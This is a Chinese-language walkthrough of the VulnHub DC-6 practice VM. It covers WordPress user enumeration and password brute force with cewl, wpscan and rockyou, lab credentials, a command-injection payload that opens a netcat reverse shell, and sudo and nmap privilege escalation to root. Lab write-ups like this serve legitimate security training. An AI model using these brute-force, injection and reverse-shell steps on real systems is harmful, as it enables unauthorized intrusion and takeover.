总结:wpscan爆破，nmap提权

下载地址

漏洞分析

信息收集

用户和密码爆破

命令执行

方法一：

方法二：

提权

下载地址

DC-6.zip (Size: 619 MB)

Download: http://www.five86.com/downloads/DC-6.zip

Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip

使用方法:解压后，使用vm直接打开ova文件。

漏洞分析

信息收集

这里还是使用DC-1的方法

1.给靶机设置一个快照

2.fping -agq 192.168.1.0/24 使用fping快速扫描该网段中存活的机子

3.将靶机关闭重新扫描一下，对比少的那个ip就是靶机的ip

4.使用快照快速将靶机恢复

注：ip段要看自己的

这里只有22和80端口是开启的，这里查看一下网站。

这里出现和dc-2一样的问题，这里修改一下hosts文件就可以了

linux 通常在/etc/hosts
vim /etc/hosts 然后添加一行
靶机ip wordy

这里在网站没有找到什么东西，使用dirsearch扫目录来看看

这里选择的url是http://靶机ip，并不是重定向以后的网址。

这里去访问/wp-login.php，有后台的登入，但是经过访问，尝试弱口令还是不行，准备使用插件wappalyzer看看网站的指纹。

用户和密码爆破

这里看了看决定使用cewl和wpscan的组合。

//根据网页的内容输出一个字典
cewl https://www.wordy.com/ -w pass.txt//使用命令枚举这个网站的用户
wpscan --url https://www.wordy.com/ -e u  #使用这个没有枚举成功
wpscan --url http://wordy/ -e u  #这个成功了，有点想不明白//将枚举出来的几个用户输入到user.txt
echo "admin\ngraham\nmark\nsarah\njens" > user.txt//尝试爆破密码
wpscan --url wordy -U user.txt -P passwd.txt

这里使用cewl获得的字典pass.txt，但是没有破解出来。。。。

去看别人的wp才知道要使用/usr/share/wordlists/rockyou.txt作为字典，但是这个字典很大，我就将一些关于密码的一些提取到一个字典中，这时候我已经知道密码是helpdesk01了

注意：rockyou.txt字典是一个压缩包需要我们自己解压。

//提取相关密码到一个新的字典文件
cat /usr/share/wordlists/rockyou.txt | grep help > passwd.txt//这里重新爆破
wpscan --url wordy -U user.txt -P passwd.txt

这里爆破出来了,http://wordy/wp-login.php 在这里登录

mark:helpdesk01

命令执行

这里找了半天也不知道那里有漏洞可以利用，多谢别人提醒，不然还不知道要找到什么时候

找到这里有一个命令执行的漏洞

这里看看。

这样就可以了，但是经过测试，这里有长度限制，但是经过查看只有前端的限制，后端没有限制，所以我们就可对前端修改就可以了

方法一：

这里长度限制15，但是我们可以修改。

方法二：

也是可以使用burpsuite来拦包修改，这里没有长度限制。

这里开始反弹shell

127.0.0.1;nc -e /bin/bash ip 端口//使用python搞一个伪shell
python -c "import pty;pty.spawn('/bin/bash')"

提权

这里原本想先用sudo -l看看有没有什么可以利用的，但是这里我们不知道www-data的密码，这里查看内核版本号，经过查看也没有什么可以利用的。

最后在用户的根目录中发现了可以文件夹，/home/mark/stuff中发现一个things-to-do.txt

这里发现了graham用户的密码,然后我们通过su来到graham用户中

graham:GSo7isUM1D4

在这里发现sudo -l没有需要密码，而且还有东西，这里去看看

//来到提权文件那里
cd /home/jens//添加可以提权的东西
echo "/bin/bash" >> backups.sh//这里原本直接提权到root，但是失败了
sudo -u root ./backups.sh//这里选择到jens中
sudo -u jens ./backups.sh

这里发现sudo -l,又发现了东西

这里查看一些关于nmap的提权方法。

这里就提权到root了

vulnhub DC系列 DC-6相关推荐

Vulnhub靶机DC系列-DC-8
Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...
DC系列：1 （DC-1靶机，初级渗透详细教程）
DC-1靶机渗透环境搭建详情描述使用工具一:信息收集基础信息查询 0x01 查看存活主机 0x02 查看开放端口 0x03 查看端口服务 0x04 扫描网站根目录及指纹信息 0x05 访问 ...
DC系列漏洞靶场-渗透测试学习复现（DC-1）
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们 ...
【CyberSecurityLearning 74】DC系列之DC-5渗透测试
目录 DC系列之DC-5渗透测试实验环境: 实验步骤: 1.主机扫描,确定目标主机IP 2.对DC-5进行端口扫描 3.访问DC-5的web服务,了解相关信息 4.使用wfuzz测试页面参数 5.看 ...
DC系列靶机DC-1
1,主机发现 1),nmap -sP 192.168.44.0/24 对当前网段内存活的主机进行扫描. 2),主机发现也可以使用 netdiscover -i eth0 -r 192.168.44.0 ...
新能源汽车6kw充电机，DC to DC双向升降压48～54VDC输入，输出320VDC，双向可以输入
新能源汽车6kw充电机,DC to DC双向升降压48-54VDC输入,输出320VDC,双向可以输入,输出. MCU TMS320C2 系列TI DSP高性能芯片 PI 2SC0435T方案,驱动英 ...
VulnHub靶场系列：Flick
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...
干货 | 带你解锁AC/DC、DC/DC转换器基础
首先,我们过一下AC(交流)和DC(直流)的概念. 何谓AC Alternating Current(交流)的首字母缩写. AC是大小和极性(方向)随时间呈周期性变化的电流. 电流极性在1秒内的变化次 ...
SC8701 120W DC TO DC 电源模块的设计
SC8701 120W DC TO DC 电源模块的设计 sc8701是一款同步4开关的buck-boost控制器,支持2.7~36V宽压输入,和2~36V输出,支持输入限流,输出限流,过温等保护功能 ...
AC/DC、DC/DC转换器知识
首先,我们过一下AC(交流)和DC(直流)的概念. 何谓AC Alternating Current(交流)的首字母缩写. AC是大小和极性(方向)随时间呈周期性变化的电流. 电流极性在1秒内的变化次 ...

vulnhub DC系列 DC-6

下载地址

漏洞分析

信息收集

用户和密码爆破

命令执行

方法一：

方法二：

提权

vulnhub DC系列 DC-6相关推荐

最新文章

热门文章